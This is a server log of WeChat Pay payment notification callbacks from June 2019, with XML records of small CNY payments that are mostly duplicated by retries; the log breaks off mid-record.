支付时间：2019-06-06 01:40:20
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[f0ih0jogt4sj29cowyslv61kxrmi5kq9]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[561620190606074013]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[458B62185F5B65BACCC9ACD94DB345DF]]></sign>
<time_end><![CDATA[20190606074018]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000289201906065425111140]]></transaction_id>
</xml>
支付时间：2019-06-06 01:40:35
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[f0ih0jogt4sj29cowyslv61kxrmi5kq9]]></nonce_str>
<openid><![CDATA[o6Iva5t6ULiFJrio6Veww2M3YVSo]]></openid>
<out_trade_no><![CDATA[561620190606074013]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[458B62185F5B65BACCC9ACD94DB345DF]]></sign>
<time_end><![CDATA[20190606074018]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000289201906065425111140]]></transaction_id>
</xml>
支付时间：2019-06-06 02:06:11
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[jj7ppy7lmyus12uqdikcf00nh6m4wbo1]]></nonce_str>
<openid><![CDATA[o6Iva5r9e6bUDmp6cU8VhEimGGE0]]></openid>
<out_trade_no><![CDATA[189920190606080543]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8A56B40F92A3DD58B5B282F5DB8D72A0]]></sign>
<time_end><![CDATA[20190606080610]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906067161193042]]></transaction_id>
</xml>
支付时间：2019-06-06 02:06:27
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[jj7ppy7lmyus12uqdikcf00nh6m4wbo1]]></nonce_str>
<openid><![CDATA[o6Iva5r9e6bUDmp6cU8VhEimGGE0]]></openid>
<out_trade_no><![CDATA[189920190606080543]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[8A56B40F92A3DD58B5B282F5DB8D72A0]]></sign>
<time_end><![CDATA[20190606080610]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906067161193042]]></transaction_id>
</xml>
支付时间：2019-06-06 05:44:51
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[z03akek0wel9wtcsvuyun9igpc9j65zu]]></nonce_str>
<openid><![CDATA[o6Iva5oF7fZMfmklRe22O9ZNSOfA]]></openid>
<out_trade_no><![CDATA[889120190606114443]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[531BEEEA4089405626D84B3B536D95D1]]></sign>
<time_end><![CDATA[20190606114451]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906061875967154]]></transaction_id>
</xml>
支付时间：2019-06-06 05:45:07
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[z03akek0wel9wtcsvuyun9igpc9j65zu]]></nonce_str>
<openid><![CDATA[o6Iva5oF7fZMfmklRe22O9ZNSOfA]]></openid>
<out_trade_no><![CDATA[889120190606114443]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[531BEEEA4089405626D84B3B536D95D1]]></sign>
<time_end><![CDATA[20190606114451]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000305201906061875967154]]></transaction_id>
</xml>
支付时间：2019-06-06 05:49:31
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[PSBC_DEBIT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[m4n8ozord1lkulrwtzg5xdmr89g3pfkb]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[164220190606114834]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[DF3A171C365F1C8E73A32E766A8E5332]]></sign>
<time_end><![CDATA[20190606114930]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000292201906062679046680]]></transaction_id>
</xml>
支付时间：2019-06-06 05:49:42
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1170]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[zewmniu69czq14cmut1mnqxk2qep1hqn]]></nonce_str>
<openid><![CDATA[o6Iva5qPMroa1QkaZty5hWjcYpCI]]></openid>
<out_trade_no><![CDATA[624120190606114932]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[D7F04754F5F7D65C5B3AA2B6A3489918]]></sign>
<time_end><![CDATA[20190606114940]]></time_end>
<total_fee>1170</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906065113439453]]></transaction_id>
</xml>
支付时间：2019-06-06 05:49:46
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[PSBC_DEBIT]]></bank_type>
<cash_fee><![CDATA[450]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[m4n8ozord1lkulrwtzg5xdmr89g3pfkb]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[164220190606114834]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[DF3A171C365F1C8E73A32E766A8E5332]]></sign>
<time_end><![CDATA[20190606114930]]></time_end>
<total_fee>450</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000292201906062679046680]]></transaction_id>
</xml>
支付时间：2019-06-06 05:49:57
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[1170]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[zewmniu69czq14cmut1mnqxk2qep1hqn]]></nonce_str>
<openid><![CDATA[o6Iva5qPMroa1QkaZty5hWjcYpCI]]></openid>
<out_trade_no><![CDATA[624120190606114932]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[D7F04754F5F7D65C5B3AA2B6A3489918]]></sign>
<time_end><![CDATA[20190606114940]]></time_end>
<total_fee>1170</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000298201906065113439453]]></transaction_id>
</xml>
支付时间：2019-06-06 05:50:32
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[PSBC_DEBIT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[0gubtykjydggugu7jae25e40ceszvsaz]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[776720190606115006]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[A3F1F735ACC331F03D7F5A55BE8FBFB1]]></sign>
<time_end><![CDATA[20190606115031]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906065678183288]]></transaction_id>
</xml>
支付时间：2019-06-06 05:50:47
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[PSBC_DEBIT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[0gubtykjydggugu7jae25e40ceszvsaz]]></nonce_str>
<openid><![CDATA[o6Iva5rocKHwOkzPKW50lmVs-BRA]]></openid>
<out_trade_no><![CDATA[776720190606115006]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[A3F1F735ACC331F03D7F5A55BE8FBFB1]]></sign>
<time_end><![CDATA[20190606115031]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906065678183288]]></transaction_id>
</xml>
支付时间：2019-06-06 05:53:39
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[q8hk40nn0j2iqy4ja7ddrf7cdgvzzl0i]]></nonce_str>
<openid><![CDATA[o6Iva5j6Gg-_TGTx1JuxEOhZCi1U]]></openid>
<out_trade_no><![CDATA[109620190606115329]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B77A5ABD439E93C49DB46CB3A546334E]]></sign>
<time_end><![CDATA[20190606115338]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000307201906061974012274]]></transaction_id>
</xml>
支付时间：2019-06-06 05:53:55
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[q8hk40nn0j2iqy4ja7ddrf7cdgvzzl0i]]></nonce_str>
<openid><![CDATA[o6Iva5j6Gg-_TGTx1JuxEOhZCi1U]]></openid>
<out_trade_no><![CDATA[109620190606115329]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[B77A5ABD439E93C49DB46CB3A546334E]]></sign>
<time_end><![CDATA[20190606115338]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000307201906061974012274]]></transaction_id>
</xml>
支付时间：2019-06-06 05:54:26
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[504]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[pdfcgmz51ihmcwfsl7v5096q32azdx0c]]></nonce_str>
<openid><![CDATA[o6Iva5tg88hK0hDLFpmrYk83kwAw]]></openid>
<out_trade_no><![CDATA[421820190606115414]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[4213B6934C6BE6B81861F1CEAE98F20B]]></sign>
<time_end><![CDATA[20190606115426]]></time_end>
<total_fee>504</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906066308215598]]></transaction_id>
</xml>
支付时间：2019-06-06 05:54:42
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ty0d65h0e7o1ew3phwatl7bdh7l2g1oz]]></nonce_str>
<openid><![CDATA[o6Iva5pzCXnvf2yZvhxg7m1zxrhc]]></openid>
<out_trade_no><![CDATA[559520190606115434]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[76A2BA1BD65A89F2EE4792325E53548F]]></sign>
<time_end><![CDATA[20190606115441]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000303201906062221016598]]></transaction_id>
</xml>
支付时间：2019-06-06 05:54:43
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[504]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[pdfcgmz51ihmcwfsl7v5096q32azdx0c]]></nonce_str>
<openid><![CDATA[o6Iva5tg88hK0hDLFpmrYk83kwAw]]></openid>
<out_trade_no><![CDATA[421820190606115414]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[4213B6934C6BE6B81861F1CEAE98F20B]]></sign>
<time_end><![CDATA[20190606115426]]></time_end>
<total_fee>504</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000295201906066308215598]]></transaction_id>
</xml>
支付时间：2019-06-06 05:54:57
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ty0d65h0e7o1ew3phwatl7bdh7l2g1oz]]></nonce_str>
<openid><![CDATA[o6Iva5pzCXnvf2yZvhxg7m1zxrhc]]></openid>
<out_trade_no><![CDATA[559520190606115434]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[76A2BA1BD65A89F2EE4792325E53548F]]></sign>
<time_end><![CDATA[20190606115441]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000303201906062221016598]]></transaction_id>
</xml>
支付时间：2019-06-06 05:55:14
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[otd637e7tkj2otdl3tmjadprx9wo2iro]]></nonce_str>
<openid><![CDATA[o6Iva5honFgWQeemqYtlxYfr6FFw]]></openid>
<out_trade_no><![CDATA[137520190606115502]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[3553DE019D81575AA1F415783BB03686]]></sign>
<time_end><![CDATA[20190606115513]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906068208882318]]></transaction_id>
</xml>
支付时间：2019-06-06 05:55:30
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[540]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[otd637e7tkj2otdl3tmjadprx9wo2iro]]></nonce_str>
<openid><![CDATA[o6Iva5honFgWQeemqYtlxYfr6FFw]]></openid>
<out_trade_no><![CDATA[137520190606115502]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[3553DE019D81575AA1F415783BB03686]]></sign>
<time_end><![CDATA[20190606115513]]></time_end>
<total_fee>540</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000293201906068208882318]]></transaction_id>
</xml>
支付时间：2019-06-06 05:55:52
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[780]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[4u18mw57krh1fcha5kl2lvu3ii14tf9j]]></nonce_str>
<openid><![CDATA[o6Iva5jh4OWAuJ5qPhOjmgk06wcw]]></openid>
<out_trade_no><![CDATA[183220190606115541]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[E57CB77E573B1C8D4D00EE98E25E70C2]]></sign>
<time_end><![CDATA[20190606115551]]></time_end>
<total_fee>780</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000299201906067392796595]]></transaction_id>
</xml>
支付时间：2019-06-06 05:56:07
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[32wks2u7x8fptgnvcxjeu4fr930432n2]]></nonce_str>
<openid><![CDATA[o6Iva5sjUMzVJHT3TDd4gjimg2zU]]></openid>
<out_trade_no><![CDATA[119420190606115557]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[02B62DC280DC994E1EEE98AC0E75ADF3]]></sign>
<time_end><![CDATA[20190606115606]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000296201906060815907302]]></transaction_id>
</xml>
支付时间：2019-06-06 05:56:08
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[780]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[4u18mw57krh1fcha5kl2lvu3ii14tf9j]]></nonce_str>
<openid><![CDATA[o6Iva5jh4OWAuJ5qPhOjmgk06wcw]]></openid>
<out_trade_no><![CDATA[183220190606115541]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[E57CB77E573B1C8D4D00EE98E25E70C2]]></sign>
<time_end><![CDATA[20190606115551]]></time_end>
<total_fee>780</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000299201906067392796595]]></transaction_id>
</xml>
支付时间：2019-06-06 05:56:08
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[810]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ir5zlqfcrlrd3h13ugmb5ba1idbjbdi3]]></nonce_str>
<openid><![CDATA[o6Iva5kstOoTxR6fANs15j2eH234]]></openid>
<out_trade_no><![CDATA[630520190606115601]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[4110C2B24C38BBD80B5C867ABA4DEDF8]]></sign>
<time_end><![CDATA[20190606115607]]></time_end>
<total_fee>810</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000307201906061465205247]]></transaction_id>
</xml>
支付时间：2019-06-06 05:56:23
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[630]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[32wks2u7x8fptgnvcxjeu4fr930432n2]]></nonce_str>
<openid><![CDATA[o6Iva5sjUMzVJHT3TDd4gjimg2zU]]></openid>
<out_trade_no><![CDATA[119420190606115557]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[02B62DC280DC994E1EEE98AC0E75ADF3]]></sign>
<time_end><![CDATA[20190606115606]]></time_end>
<total_fee>630</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000296201906060815907302]]></transaction_id>
</xml>
支付时间：2019-06-06 05:56:24
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[810]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[ir5zlqfcrlrd3h13ugmb5ba1idbjbdi3]]></nonce_str>
<openid><![CDATA[o6Iva5kstOoTxR6fANs15j2eH234]]></openid>
<out_trade_no><![CDATA[630520190606115601]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[4110C2B24C38BBD80B5C867ABA4DEDF8]]></sign>
<time_end><![CDATA[20190606115607]]></time_end>
<total_fee>810</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000307201906061465205247]]></transaction_id>
</xml>
支付时间：2019-06-06 05:58:06
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[730]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[j6hx662e20m67h0j5icx6mvlytrth0le]]></nonce_str>
<openid><![CDATA[o6Iva5qpp4wXb-fK9QiFOWRraJ4M]]></openid>
<out_trade_no><![CDATA[586720190606115756]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[064BE5592B1FCCEC3F91C6919AC5E020]]></sign>
<time_end><![CDATA[20190606115806]]></time_end>
<total_fee>730</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906062363102579]]></transaction_id>
</xml>
支付时间：2019-06-06 05:58:22
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[730]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[j6hx662e20m67h0j5icx6mvlytrth0le]]></nonce_str>
<openid><![CDATA[o6Iva5qpp4wXb-fK9QiFOWRraJ4M]]></openid>
<out_trade_no><![CDATA[586720190606115756]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[064BE5592B1FCCEC3F91C6919AC5E020]]></sign>
<time_end><![CDATA[20190606115806]]></time_end>
<total_fee>730</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000308201906062363102579]]></transaction_id>
</xml>
支付时间：2019-06-06 05:59:05
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[uwoxawcbx4fbzwq1bsuijeae225au8ua]]></nonce_str>
<openid><![CDATA[o6Iva5sjUMzVJHT3TDd4gjimg2zU]]></openid>
<out_trade_no><![CDATA[150520190606115854]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[A49C50E8BE6B67E20CAB06E3E2526231]]></sign>
<time_end><![CDATA[20190606115903]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000297201906066919400589]]></transaction_id>
</xml>
支付时间：2019-06-06 05:59:05
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[g806iacd46h5popin1ovandny8wqrpnq]]></nonce_str>
<openid><![CDATA[o6Iva5tg88hK0hDLFpmrYk83kwAw]]></openid>
<out_trade_no><![CDATA[756220190606115855]]></out_trade_no>
<result_code><![CDATA[SUCCESS]]></result_code>
<return_code><![CDATA[SUCCESS]]></return_code>
<sign><![CDATA[D9BB91367E356A587604ABF608536AC7]]></sign>
<time_end><![CDATA[20190606115904]]></time_end>
<total_fee>360</total_fee>
<trade_type><![CDATA[JSAPI]]></trade_type>
<transaction_id><![CDATA[4200000304201906065120339056]]></transaction_id>
</xml>
支付时间：2019-06-06 05:59:21
<xml><appid><![CDATA[wxc0b30000d65d2286]]></appid>
<bank_type><![CDATA[CFT]]></bank_type>
<cash_fee><![CDATA[360]]></cash_fee>
<fee_type><![CDATA[CNY]]></fee_type>
<is_subscribe><![CDATA[Y]]></is_subscribe>
<mch_id><![CDATA[1523992141]]></mch_id>
<nonce_str><![CDATA[g806iacd46h5popin1ovandny8wqrpnq]]></nonce_str>
<openid><![CDATA[o6Iva5tg88hK0hDLFpmrYk83kwAw]]></openid>
